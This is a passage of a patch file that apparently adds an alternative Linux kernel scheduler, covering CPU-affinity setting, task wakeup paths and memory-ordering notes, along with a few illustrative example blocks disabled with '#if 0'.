++	const struct cpumask *cpu_valid_mask = cpu_active_mask;
++	bool kthread = p->flags & PF_KTHREAD;
++	int dest_cpu;
++	int ret = 0;
++
++	if (kthread || is_migration_disabled(p)) {
++		/*
++		 * Kernel threads are allowed on online && !active CPUs,
++		 * however, during cpu-hot-unplug, even these might get pushed
++		 * away if not KTHREAD_IS_PER_CPU.
++		 *
++		 * Specifically, migration_disabled() tasks must not fail the
++		 * cpumask_any_and_distribute() pick below, esp. so on
++		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
++		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
++		 */
++		cpu_valid_mask = cpu_online_mask;
++	}
++
++	if (!kthread && !cpumask_subset(ctx->new_mask, cpu_allowed_mask)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	/*
++	 * Must re-check here, to close a race against __kthread_bind(),
++	 * sched_setaffinity() is not guaranteed to observe the flag.
++	 */
++	if ((ctx->flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (cpumask_equal(&p->cpus_mask, ctx->new_mask))
++		goto out;
++
++	dest_cpu = cpumask_any_and(cpu_valid_mask, ctx->new_mask);
++	if (dest_cpu >= nr_cpu_ids) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	__do_set_cpus_allowed(p, ctx);
++
++	return affine_move_task(rq, p, dest_cpu, lock, irq_flags);
++
++out:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++
++	return ret;
++}
++
++/*
++ * Change a given task's CPU affinity. Migrate the thread to a
++ * proper CPU and schedule it away if the CPU it is executing on
++ * is removed from the allowed bitmask.
++ *
++ * NOTE: the caller must have a valid reference to the task, the
++ * task must not exit() & deallocate itself prematurely. The
++ * call is not atomic; no spinlocks may be held.
++ */
++static int __set_cpus_allowed_ptr(struct task_struct *p,
++				  struct affinity_context *ctx)
++{
++	unsigned long irq_flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++	/*
++	 * Masking should be skipped if SCA_USER or any of the SCA_MIGRATE_*
++	 * flags are set.
++	 */
++	if (p->user_cpus_ptr &&
++	    !(ctx->flags & SCA_USER) &&
++	    cpumask_and(rq->scratch_mask, ctx->new_mask, p->user_cpus_ptr))
++		ctx->new_mask = rq->scratch_mask;
++
++	return __set_cpus_allowed_ptr_locked(p, ctx, rq, lock, irq_flags);
++}
++
++int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	struct affinity_context ac = {
++		.new_mask  = new_mask,
++		.flags     = 0,
++	};
++
++	return __set_cpus_allowed_ptr(p, &ac);
++}
++EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
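++
++/*
++ * Editorial note: a minimal, illustrative sketch of a typical caller of
++ * set_cpus_allowed_ptr(). The helper name is hypothetical; only the API
++ * exported above is real. Wrapped in #if 0 so it is clearly not part of
++ * the patch itself.
++ */
++#if 0	/* illustrative example only */
++static void example_pin_to_cpu(struct task_struct *p, int cpu)
++{
++	/* Shrink the task's affinity mask to a single CPU. */
++	WARN_ON_ONCE(set_cpus_allowed_ptr(p, cpumask_of(cpu)));
++}
++#endif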
++
++/*
++ * Change a given task's CPU affinity to the intersection of its current
++ * affinity mask and @subset_mask, writing the resulting mask to @new_mask.
++ * If user_cpus_ptr is defined, use it as the basis for restricting CPU
++ * affinity or use cpu_online_mask instead.
++ *
++ * If the resulting mask is empty, leave the affinity unchanged and return
++ * -EINVAL.
++ */
++static int restrict_cpus_allowed_ptr(struct task_struct *p,
++				     struct cpumask *new_mask,
++				     const struct cpumask *subset_mask)
++{
++	struct affinity_context ac = {
++		.new_mask  = new_mask,
++		.flags     = 0,
++	};
++	unsigned long irq_flags;
++	raw_spinlock_t *lock;
++	struct rq *rq;
++	int err;
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	if (!cpumask_and(new_mask, task_user_cpus(p), subset_mask)) {
++		err = -EINVAL;
++		goto err_unlock;
++	}
++
++	return __set_cpus_allowed_ptr_locked(p, &ac, rq, lock, irq_flags);
++
++err_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	return err;
++}
++
++/*
++ * Restrict the CPU affinity of task @p so that it is a subset of
++ * task_cpu_possible_mask() and point @p->user_cpus_ptr to a copy of the
++ * old affinity mask. If the resulting mask is empty, we warn and walk
++ * up the cpuset hierarchy until we find a suitable mask.
++ */
++void force_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	cpumask_var_t new_mask;
++	const struct cpumask *override_mask = task_cpu_possible_mask(p);
++
++	alloc_cpumask_var(&new_mask, GFP_KERNEL);
++
++	/*
++	 * __migrate_task() can fail silently in the face of concurrent
++	 * offlining of the chosen destination CPU, so take the hotplug
++	 * lock to ensure that the migration succeeds.
++	 */
++	cpus_read_lock();
++	if (!cpumask_available(new_mask))
++		goto out_set_mask;
++
++	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
++		goto out_free_mask;
++
++	/*
++	 * We failed to find a valid subset of the affinity mask for the
++	 * task, so override it based on its cpuset hierarchy.
++	 */
++	cpuset_cpus_allowed(p, new_mask);
++	override_mask = new_mask;
++
++out_set_mask:
++	if (printk_ratelimit()) {
++		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
++				task_pid_nr(p), p->comm,
++				cpumask_pr_args(override_mask));
++	}
++
++	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
++out_free_mask:
++	cpus_read_unlock();
++	free_cpumask_var(new_mask);
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, struct affinity_context *ctx);
++
++/*
++ * Restore the affinity of a task @p which was previously restricted by a
++ * call to force_compatible_cpus_allowed_ptr().
++ *
++ * It is the caller's responsibility to serialise this with any calls to
++ * force_compatible_cpus_allowed_ptr(@p).
++ */
++void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	struct affinity_context ac = {
++		.new_mask  = task_user_cpus(p),
++		.flags     = 0,
++	};
++	int ret;
++
++	/*
++	 * Try to restore the old affinity mask with __sched_setaffinity().
++	 * Cpuset masking will be done there too.
++	 */
++	ret = __sched_setaffinity(p, &ac);
++	WARN_ON_ONCE(ret);
++}
++
++#else /* CONFIG_SMP */
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	return 0;
++}
++
++static inline int
++__set_cpus_allowed_ptr(struct task_struct *p,
++		       struct affinity_context *ctx)
++{
++	return set_cpus_allowed_ptr(p, ctx->new_mask);
++}
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return false;
++}
++
++static inline cpumask_t *alloc_user_cpus_ptr(int node)
++{
++	return NULL;
++}
++
++#endif /* !CONFIG_SMP */
++
++static void
++ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq;
++
++	if (!schedstat_enabled())
++		return;
++
++	rq = this_rq();
++
++#ifdef CONFIG_SMP
++	if (cpu == rq->cpu) {
++		__schedstat_inc(rq->ttwu_local);
++		__schedstat_inc(p->stats.nr_wakeups_local);
++	} else {
++		/* Alt schedule FW ToDo:
++		 * How to do ttwu_wake_remote
++		 */
++	}
++#endif /* CONFIG_SMP */
++
++	__schedstat_inc(rq->ttwu_count);
++	__schedstat_inc(p->stats.nr_wakeups);
++}
++
++/*
++ * Mark the task runnable and perform wakeup-preemption.
++ */
++static inline void
++ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	check_preempt_curr(rq);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	trace_sched_wakeup(p);
++}
++
++static inline void
++ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	if (p->sched_contributes_to_load)
++		rq->nr_uninterruptible--;
++
++	if (
++#ifdef CONFIG_SMP
++	    !(wake_flags & WF_MIGRATED) &&
++#endif
++	    p->in_iowait) {
++		delayacct_blkio_end(p);
++		atomic_dec(&task_rq(p)->nr_iowait);
++	}
++
++	activate_task(p, rq);
++	ttwu_do_wakeup(rq, p, 0);
++}
++
++/*
++ * Consider @p being inside a wait loop:
++ *
++ *   for (;;) {
++ *      set_current_state(TASK_UNINTERRUPTIBLE);
++ *
++ *      if (CONDITION)
++ *         break;
++ *
++ *      schedule();
++ *   }
++ *   __set_current_state(TASK_RUNNING);
++ *
++ * between set_current_state() and schedule(). In this case @p is still
++ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
++ * an atomic manner.
++ *
++ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
++ * then schedule() must still happen and p->state can be changed to
++ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
++ * need to do a full wakeup with enqueue.
++ *
++ * Returns: %true when the wakeup is done,
++ *          %false otherwise.
++ */
++static int ttwu_runnable(struct task_struct *p, int wake_flags)
++{
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	int ret = 0;
++
++	rq = __task_access_lock(p, &lock);
++	if (task_on_rq_queued(p)) {
++		/* check_preempt_curr() may use rq clock */
++		update_rq_clock(rq);
++		ttwu_do_wakeup(rq, p, wake_flags);
++		ret = 1;
++	}
++	__task_access_unlock(p, lock);
++
++	return ret;
++}
++
++#ifdef CONFIG_SMP
++void sched_ttwu_pending(void *arg)
++{
++	struct llist_node *llist = arg;
++	struct rq *rq = this_rq();
++	struct task_struct *p, *t;
++	struct rq_flags rf;
++
++	if (!llist)
++		return;
++
++	rq_lock_irqsave(rq, &rf);
++	update_rq_clock(rq);
++
++	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
++		if (WARN_ON_ONCE(p->on_cpu))
++			smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
++			set_task_cpu(p, cpu_of(rq));
++
++		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
++	}
++
++	/*
++	 * Must be after enqueueing at least one task such that
++	 * idle_cpu() does not observe a false-negative -- if it does,
++	 * it is possible for select_idle_siblings() to stack a number
++	 * of tasks on this CPU during that window.
++	 *
++	 * It is ok to clear ttwu_pending when another task is pending.
++	 * We will receive IPI after local irq enabled and then enqueue it.
++	 * Since now nr_running > 0, idle_cpu() will always get correct result.
++	 */
++	WRITE_ONCE(rq->ttwu_pending, 0);
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++void send_call_function_single_ipi(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (!set_nr_if_polling(rq->idle))
++		arch_send_call_function_single_ipi(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++/*
++ * Queue a task on the target CPU's wake_list and wake the CPU via IPI if
++ * necessary. The wakee CPU on receipt of the IPI will queue the task
++ * via sched_ttwu_pending() for activation so the wakee incurs the cost
++ * of the wakeup instead of the waker.
++ */
++static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
++
++	WRITE_ONCE(rq->ttwu_pending, 1);
++	__smp_call_single_queue(cpu, &p->wake_entry.llist);
++}
++
++static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
++{
++	/*
++	 * Do not complicate things with the async wake_list while the CPU is
++	 * in hotplug state.
++	 */
++	if (!cpu_active(cpu))
++		return false;
++
++	/* Ensure the task will still be allowed to run on the CPU. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/*
++	 * If the CPU does not share cache, then queue the task on the
++	 * remote rq's wakelist to avoid accessing remote data.
++	 */
++	if (!cpus_share_cache(smp_processor_id(), cpu))
++		return true;
++
++	if (cpu == smp_processor_id())
++		return false;
++
++	/*
++	 * If the wakee cpu is idle, or the task is descheduling and the
++	 * only running task on the CPU, then use the wakelist to offload
++	 * the task activation to the idle (or soon-to-be-idle) CPU as
++	 * the current CPU is likely busy. nr_running is checked to
++	 * avoid unnecessary task stacking.
++	 *
++	 * Note that we can only get here with (wakee) p->on_rq=0,
++	 * p->on_cpu can be whatever, we've done the dequeue, so
++	 * the wakee has been accounted out of ->nr_running.
++	 */
++	if (!cpu_rq(cpu)->nr_running)
++		return true;
++
++	return false;
++}
++
++static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
++		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
++		__ttwu_queue_wakelist(p, cpu, wake_flags);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_if_idle(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	rcu_read_lock();
++
++	if (!is_idle_task(rcu_dereference(rq->curr)))
++		goto out;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (is_idle_task(rq->curr))
++		resched_curr(rq);
++	/* Else CPU is not idle, do nothing here */
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out:
++	rcu_read_unlock();
++}
++
++bool cpus_share_cache(int this_cpu, int that_cpu)
++{
++	if (this_cpu == that_cpu)
++		return true;
++
++	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
++}
++#else /* !CONFIG_SMP */
++
++static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	return false;
++}
++
++#endif /* CONFIG_SMP */
++
++static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (ttwu_queue_wakelist(p, cpu, wake_flags))
++		return;
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++	ttwu_do_activate(rq, p, wake_flags);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Invoked from try_to_wake_up() to check whether the task can be woken up.
++ *
++ * The caller holds p::pi_lock if p != current or has preemption
++ * disabled when p == current.
++ *
++ * The rules of PREEMPT_RT saved_state:
++ *
++ *   The related locking code always holds p::pi_lock when updating
++ *   p::saved_state, which means the code is fully serialized in both cases.
++ *
++ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT, with no
++ *   other bits set. This allows us to distinguish all wakeup scenarios.
++ */
++static __always_inline
++bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
++{
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
++		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
++			     state != TASK_RTLOCK_WAIT);
++	}
++
++	if (READ_ONCE(p->__state) & state) {
++		*success = 1;
++		return true;
++	}
++
++#ifdef CONFIG_PREEMPT_RT
++	/*
++	 * Saved state preserves the task state across blocking on
++	 * an RT lock.  If the state matches, set p::saved_state to
++	 * TASK_RUNNING, but do not wake the task because it waits
++	 * for a lock wakeup. Also indicate success because from
++	 * the regular waker's point of view this has succeeded.
++	 *
++	 * After acquiring the lock the task will restore p::__state
++	 * from p::saved_state which ensures that the regular
++	 * wakeup is not lost. The restore will also set
++	 * p::saved_state to TASK_RUNNING so any further tests will
++	 * not result in false positives vs. @success
++	 */
++	if (p->saved_state & state) {
++		p->saved_state = TASK_RUNNING;
++		*success = 1;
++	}
++#endif
++	return false;
++}
++
++/*
++ * Notes on Program-Order guarantees on SMP systems.
++ *
++ *  MIGRATION
++ *
++ * The basic program-order guarantee on SMP systems is that when a task [t]
++ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
++ * execution on its new CPU [c1].
++ *
++ * For migration (of runnable tasks) this is provided by the following means:
++ *
++ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
++ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
++ *     rq(c1)->lock (if not at the same time, then in that order).
++ *  C) LOCK of the rq(c1)->lock scheduling in task
++ *
++ * Transitivity guarantees that B happens after A and C after B.
++ * Note: we only require RCpc transitivity.
++ * Note: the CPU doing B need not be c0 or c1
++ *
++ * Example:
++ *
++ *   CPU0            CPU1            CPU2
++ *
++ *   LOCK rq(0)->lock
++ *   sched-out X
++ *   sched-in Y
++ *   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(0)->lock // orders against CPU0
++ *                                   dequeue X
++ *                                   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(1)->lock
++ *                                   enqueue X
++ *                                   UNLOCK rq(1)->lock
++ *
++ *                   LOCK rq(1)->lock // orders against CPU2
++ *                   sched-out Z
++ *                   sched-in X
++ *                   UNLOCK rq(1)->lock
++ *
++ *
++ *  BLOCKING -- aka. SLEEP + WAKEUP
++ *
++ * For blocking we (obviously) need to provide the same guarantee as for
++ * migration. However the means are completely different as there is no lock
++ * chain to provide order. Instead we do:
++ *
++ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
++ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
++ *
++ * Example:
++ *
++ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
++ *
++ *   LOCK rq(0)->lock LOCK X->pi_lock
++ *   dequeue X
++ *   sched-out X
++ *   smp_store_release(X->on_cpu, 0);
++ *
++ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
++ *                    X->state = WAKING
++ *                    set_task_cpu(X,2)
++ *
++ *                    LOCK rq(2)->lock
++ *                    enqueue X
++ *                    X->state = RUNNING
++ *                    UNLOCK rq(2)->lock
++ *
++ *                                          LOCK rq(2)->lock // orders against CPU1
++ *                                          sched-out Z
++ *                                          sched-in X
++ *                                          UNLOCK rq(2)->lock
++ *
++ *                    UNLOCK X->pi_lock
++ *   UNLOCK rq(0)->lock
++ *
++ *
++ * However; for wakeups there is a second guarantee we must provide, namely we
++ * must observe the state that led to our wakeup. That is, not only must our
++ * task observe its own prior state, it must also observe the stores prior to
++ * its wakeup.
++ *
++ * This means that any means of doing remote wakeups must order the CPU doing
++ * the wakeup against the CPU the task is going to end up running on. This,
++ * however, is already required for the regular Program-Order guarantee above,
++ * since the waking CPU is the one issuing the ACQUIRE (smp_cond_load_acquire).
++ *
++ */
++
++/**
++ * try_to_wake_up - wake up a thread
++ * @p: the thread to be awakened
++ * @state: the mask of task states that can be woken
++ * @wake_flags: wake modifier flags (WF_*)
++ *
++ * Conceptually does:
++ *
++ *   If (@state & @p->state) @p->state = TASK_RUNNING.
++ *
++ * If the task was not queued/runnable, also place it back on a runqueue.
++ *
++ * This function is atomic against schedule() which would dequeue the task.
++ *
++ * It issues a full memory barrier before accessing @p->state, see the comment
++ * with set_current_state().
++ *
++ * Uses p->pi_lock to serialize against concurrent wake-ups.
++ *
++ * Relies on p->pi_lock stabilizing:
++ *  - p->sched_class
++ *  - p->cpus_ptr
++ *  - p->sched_task_group
++ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
++ *
++ * Tries really hard to only take one task_rq(p)->lock for performance.
++ * Takes rq->lock in:
++ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
++ *  - ttwu_queue()       -- new rq, for enqueue of the task;
++ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
++ *
++ * As a consequence we race really badly with just about everything. See the
++ * many memory barriers and their comments for details.
++ *
++ * Return: %true if @p->state changes (an actual wakeup was done),
++ *	   %false otherwise.
++ */
++static int try_to_wake_up(struct task_struct *p, unsigned int state,
++			  int wake_flags)
++{
++	unsigned long flags;
++	int cpu, success = 0;
++
++	preempt_disable();
++	if (p == current) {
++		/*
++		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
++		 * == smp_processor_id()'. Together this means we can special
++		 * case the whole 'p->on_rq && ttwu_runnable()' case below
++		 * without taking any locks.
++		 *
++		 * In particular:
++		 *  - we rely on Program-Order guarantees for all the ordering,
++		 *  - we're serialized against set_special_state() by virtue of
++		 *    it disabling IRQs (this allows not taking ->pi_lock).
++		 */
++		if (!ttwu_state_match(p, state, &success))
++			goto out;
++
++		trace_sched_waking(p);
++		WRITE_ONCE(p->__state, TASK_RUNNING);
++		trace_sched_wakeup(p);
++		goto out;
++	}
++
++	/*
++	 * If we are going to wake up a thread waiting for CONDITION we
++	 * need to ensure that CONDITION=1 done by the caller can not be
++	 * reordered with p->state check below. This pairs with smp_store_mb()
++	 * in set_current_state() that the waiting thread does.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	smp_mb__after_spinlock();
++	if (!ttwu_state_match(p, state, &success))
++		goto unlock;
++
++	trace_sched_waking(p);
++
++	/*
++	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
++	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
++	 * in smp_cond_load_acquire() below.
++	 *
++	 * sched_ttwu_pending()			try_to_wake_up()
++	 *   STORE p->on_rq = 1			  LOAD p->state
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   UNLOCK rq->lock
++	 *
++	 * [task p]
++	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * A similar smp_rmb() lives in __task_needs_rq_lock().
++	 */
++	smp_rmb();
++	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
++		goto unlock;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
++	 * possible to, falsely, observe p->on_cpu == 0.
++	 *
++	 * One must be running (->on_cpu == 1) in order to remove oneself
++	 * from the runqueue.
++	 *
++	 * __schedule() (switch to task 'p')	try_to_wake_up()
++	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (put 'p' to sleep)
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
++	 * schedule()'s deactivate_task() has 'happened' and p will no longer
++	 * care about its own p->state. See the comment in __schedule().
++	 */
++	smp_acquire__after_ctrl_dep();
++
++	/*
++	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
++	 * == 0), which means we need to do an enqueue, change p->state to
++	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
++	 * enqueue, such as ttwu_queue_wakelist().
++	 */
++	WRITE_ONCE(p->__state, TASK_WAKING);
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, consider queueing p on the remote CPU's wake_list
++	 * which potentially sends an IPI instead of spinning on p->on_cpu to
++	 * let the waker make forward progress. This is safe because IRQs are
++	 * disabled and the IPI will deliver after on_cpu is cleared.
++	 *
++	 * Ensure we load task_cpu(p) after p->on_cpu:
++	 *
++	 * set_task_cpu(p, cpu);
++	 *   STORE p->cpu = @cpu
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock
++	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
++	 *   STORE p->on_cpu = 1                LOAD p->cpu
++	 *
++	 * to ensure we observe the correct CPU on which the task is currently
++	 * scheduling.
++	 */
++	if (smp_load_acquire(&p->on_cpu) &&
++	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
++		goto unlock;
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, wait until it's done referencing the task.
++	 *
++	 * Pairs with the smp_store_release() in finish_task().
++	 *
++	 * This ensures that tasks getting woken will be fully ordered against
++	 * their previous state and preserve Program Order.
++	 */
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++	sched_task_ttwu(p);
++
++	cpu = select_task_rq(p);
++
++	if (cpu != task_cpu(p)) {
++		if (p->in_iowait) {
++			delayacct_blkio_end(p);
++			atomic_dec(&task_rq(p)->nr_iowait);
++		}
++
++		wake_flags |= WF_MIGRATED;
++		psi_ttwu_dequeue(p);
++		set_task_cpu(p, cpu);
++	}
++#else
++	cpu = task_cpu(p);
++#endif /* CONFIG_SMP */
++
++	ttwu_queue(p, cpu, wake_flags);
++unlock:
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++out:
++	if (success)
++		ttwu_stat(p, task_cpu(p), wake_flags);
++	preempt_enable();
++
++	return success;
++}
++
++static bool __task_needs_rq_lock(struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * Since p->pi_lock blocks try_to_wake_up(), we don't need rq->lock when
++	 * the task is blocked. Make sure to check @state since ttwu() can drop
++	 * locks at the end, see ttwu_queue_wakelist().
++	 */
++	if (state == TASK_RUNNING || state == TASK_WAKING)
++		return true;
++
++	/*
++	 * Ensure we load p->on_rq after p->__state, otherwise it would be
++	 * possible to, falsely, observe p->on_rq == 0.
++	 *
++	 * See try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	if (p->on_rq)
++		return true;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure the task has finished __schedule() and will not be referenced
++	 * anymore. Again, see try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++#endif
++
++	return false;
++}
++
++/**
++ * task_call_func - Invoke a function on task in fixed state
++ * @p: Process for which the function is to be invoked, can be @current.
++ * @func: Function to invoke.
++ * @arg: Argument to function.
++ *
++ * Fix the task in its current state by avoiding wakeups and/or rq operations
++ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
++ * to work out what the state is, if required.  Given that @func can be invoked
++ * with a runqueue lock held, it had better be quite lightweight.
++ *
++ * Returns:
++ *   Whatever @func returns
++ */
++int task_call_func(struct task_struct *p, task_call_f func, void *arg)
++{
++	struct rq *rq = NULL;
++	struct rq_flags rf;
++	int ret;
++
++	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
++
++	if (__task_needs_rq_lock(p))
++		rq = __task_rq_lock(p, &rf);
++
++	/*
++	 * At this point the task is pinned; either:
++	 *  - blocked and we're holding off wakeups      (pi->lock)
++	 *  - woken, and we're holding off enqueue       (rq->lock)
++	 *  - queued, and we're holding off schedule     (rq->lock)
++	 *  - running, and we're holding off de-schedule (rq->lock)
++	 *
++	 * The called function (@func) can use: task_curr(), p->on_rq and
++	 * p->__state to differentiate between these states.
++	 */
++	ret = func(p, arg);
++
++	if (rq)
++		__task_rq_unlock(rq, &rf);
++
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
++	return ret;
++}
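++
++/*
++ * Editorial note: an illustrative task_call_f callback, assuming only the
++ * signature documented above; the function name and the probed field
++ * usage are hypothetical.
++ */
++#if 0	/* illustrative example only */
++static int example_read_state(struct task_struct *p, void *arg)
++{
++	/* @p is pinned by task_call_func(); this read cannot race a wakeup. */
++	*(unsigned int *)arg = READ_ONCE(p->__state);
++	return 0;
++}
++
++/* usage: unsigned int st; task_call_func(p, example_read_state, &st); */
++#endif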
++
++/**
++ * cpu_curr_snapshot - Return a snapshot of the currently running task
++ * @cpu: The CPU on which to snapshot the task.
++ *
++ * Returns the task_struct pointer of the task "currently" running on
++ * the specified CPU.  If the same task is running on that CPU throughout,
++ * the return value will be a pointer to that task's task_struct structure.
++ * If the CPU did any context switches even vaguely concurrently with the
++ * execution of this function, the return value will be a pointer to the
++ * task_struct structure of a randomly chosen task that was running on
++ * that CPU somewhere around the time that this function was executing.
++ *
++ * If the specified CPU was offline, the return value is whatever it
++ * is, perhaps a pointer to the task_struct structure of that CPU's idle
++ * task, but there is no guarantee.  Callers wishing a useful return
++ * value must take some action to ensure that the specified CPU remains
++ * online throughout.
++ *
++ * This function executes full memory barriers before and after fetching
++ * the pointer, which permits the caller to confine this function's fetch
++ * with respect to the caller's accesses to other shared variables.
++ */
++struct task_struct *cpu_curr_snapshot(int cpu)
++{
++	struct task_struct *t;
++
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	t = rcu_dereference(cpu_curr(cpu));
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	return t;
++}
++
++/**
++ * wake_up_process - Wake up a specific process
++ * @p: The process to be woken up.
++ *
++ * Attempt to wake up the nominated process and move it to the set of runnable
++ * processes.
++ *
++ * Return: 1 if the process was woken up, 0 if it was already running.
++ *
++ * This function executes a full memory barrier before accessing the task state.
++ */
++int wake_up_process(struct task_struct *p)
++{
++	return try_to_wake_up(p, TASK_NORMAL, 0);
++}
++EXPORT_SYMBOL(wake_up_process);
++
++int wake_up_state(struct task_struct *p, unsigned int state)
++{
++	return try_to_wake_up(p, state, 0);
++}
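++
++/*
++ * Editorial note: the canonical sleeper/waker pairing served by
++ * try_to_wake_up(), shown as a hedged sketch. @example_done and the two
++ * helpers are hypothetical; the state manipulation is the standard idiom
++ * from the wait-loop comment above ttwu_runnable().
++ */
++#if 0	/* illustrative example only */
++static int example_done;
++
++static void example_sleeper(void)
++{
++	for (;;) {
++		/* Publish our state before re-checking the condition. */
++		set_current_state(TASK_UNINTERRUPTIBLE);
++		if (READ_ONCE(example_done))
++			break;
++		schedule();
++	}
++	__set_current_state(TASK_RUNNING);
++}
++
++static void example_waker(struct task_struct *sleeper)
++{
++	WRITE_ONCE(example_done, 1);	/* CONDITION = 1 ...             */
++	wake_up_process(sleeper);	/* ... then wake; ttwu orders it */
++}
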